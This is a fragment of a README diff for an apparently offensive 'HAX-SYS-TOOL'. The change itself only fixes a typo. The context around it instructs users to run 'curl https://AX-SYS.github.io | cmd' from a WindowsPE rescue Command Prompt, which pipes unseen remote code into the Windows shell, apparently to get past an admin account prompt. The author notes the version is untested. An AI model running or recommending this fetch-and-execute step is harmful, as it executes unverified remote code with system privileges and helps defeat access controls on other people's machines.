notchapplez/HAX-SYS-TOOL/README.md

   7. Execute: `curl https://AX-SYS.github.io | cmd`

 - Ethernet Required! (+ Ethernet Drivers in WindowsPE)
-- Only works when rescue Command Prompt is unlock!
+- Only works when rescue Command Prompt is unlocked!
 (Upon pressing Command Prompt and being asked for an Admin Account)
 - I've also never tested this version :3